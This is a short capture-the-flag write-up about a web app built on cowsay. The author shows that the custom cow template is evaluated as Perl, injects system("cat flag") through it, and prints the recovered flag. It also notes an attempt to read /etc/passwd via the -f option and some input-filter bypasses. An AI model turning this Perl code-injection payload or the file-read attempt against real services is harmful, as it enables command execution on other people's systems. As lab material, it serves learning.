day 04 - mooo [general]

day 4 - mooo

'Moo may represent an idea, but only the cow knows.' - Mason Cooley


Presented a site that serves cow messages based on cowsay.

Either you type your message and select a cow from dropdown or you select cow designer mode where you can specify you own cow. cowsay doesn't allow specifying cows inline as a parameter so we guess it would be through the -f option for including a file.

custom cow designer


  • @, {, }, [, $, and ] must be escaped with \.
  • %00 gives a failed message, same when you don't send a message but can be bypassed through url encoding, also entering hex values works (\xab)


According the cowsay source you can open every file, like -f /etc/passwd. This works from the command line, if a file is not found it prints the message Could not find FILE cowfile!. However the webpage responses with No such cow!. Seems the web application does a check before parsing it to the command line.

From the source of cowsay:

    my $f = $opts{'f'};
    my $full = "";
    if ($opts{'f'} =~ m,/,) {
        $full = $opts{'f'};
    } else {
        for my $d (split(/:/, $cowpath)) {
            if (-f "$d/$f") {
                $full = "$d/$f";
            } elsif (-f "$d/$f.cow") {
                $full = "$d/$f.cow";
        if ($full eq "") {
            die "$progname: Could not find $f cowfile!\n";
    do $full;

Code injection

Custom cow:

        $thoughts   ^__^
         $thoughts  ($eyes)\\_______
            (__)\\       )\\/\\
             $tongue ||----w |
                ||     ||
my $tongue = 'lol';

And for the flag:

        $thoughts   ^__^
         $thoughts  ($eyes)\\_______
            (__)\\       )\\/\\
             $tongue ||----w |
                ||     ||
system("cat flag");


AOTW{th3_p3rl_c0w_s4ys_M0oO0o0O} _______
< Mooo! >
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
             le ||----w |
                ||     ||

